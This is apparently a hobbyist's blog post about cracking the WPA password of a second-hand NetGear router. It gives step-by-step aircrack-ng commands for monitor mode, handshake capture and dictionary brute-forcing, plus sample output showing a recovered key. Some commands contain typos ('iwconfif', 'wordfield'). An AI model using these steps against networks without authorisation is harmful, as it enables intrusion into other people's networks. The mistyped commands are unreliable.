Cracked my first wireless network today. A friend I made at a phone unlocking shop here in Kono district had a NetGear router he "found" and he couldn't reset the password to use it. I wanted to try to see if I could get into it myself before just restoring it to factory defaults. A few hours later with aircrack and its docs, I got as far as starting a brute-force attack on the router with a huge dictionary word list. Having made it far enough to just let it sit for the next 24 hours and crack, I decided to just reset the router to its factory defaults make the password an extremely secure "aaaaa123" and then let it run its course for a few minutes. And Voila, cracked it!
Make sure to run everything with root privileges.
Put your wireless card into "monitor" mode (normally in "managed")
$ sudo ifconfig wlan0 down $ sudo iwconfif wlan0 mode monitor $ sudo ifconfig wlan0 up
Start listening on your wlan0 interface
$ airmon-ng start wlan0
Begin sniffing packets to see available Access points and their MAC addresses
$ airodump-ng wlan0
Get a password handshake by capturing packets and saving into a specified file to be used later.
$ airodump-ng --channel <the AP channel> --bssid <MAC of AP> --write some_file_name mon0
Brute-force the Access Point with a dictionary of passwords.
$ aircrack-ng -b <MAC of AP> -w <worldlist file> some_file_name.cap
If you don't have a dictionary file you can use wordfield to generate passwords and pipe them in.
$ wordfield -a -n 8 10 | sudo aircrack-ng -w - -b <MAC of AP> your-cap-file.cap -K
Results from a later test
Aircrack-ng 1.1 [00:16:00] 1588024 keys tested (1668.83 k/s) KEY FOUND! [ jeffnetwork ] Master Key : 6D 02 BB DB 2C 6C 59 51 1E 35 E1 D3 A5 C0 5F 8A F3 A7 BB 1A DF DF 5A 3F C8 74 DB 6F DF 58 63 66 Transient Key : 06 BC D9 30 12 74 1A 25 A8 3A E6 1B 14 EC 71 05 F3 6E 51 C5 A0 8E A1 63 2D 07 3A 2D C5 A0 15 A9 A8 3E 76 D7 99 51 5C 20 DC 1C A9 E3 FD 77 22 5F 5E F8 A5 65 EB 88 A7 AB AB 6F 56 A6 28 14 4F E2 EAPOL HMAC : 93 44 CA 90 0E 15 04 B5 49 E9 10 FB FF 2A 54 AF
Note: Hacking someones password is illegal, so make sure to abide by the laws set in place by your local law enforcement agency and all that.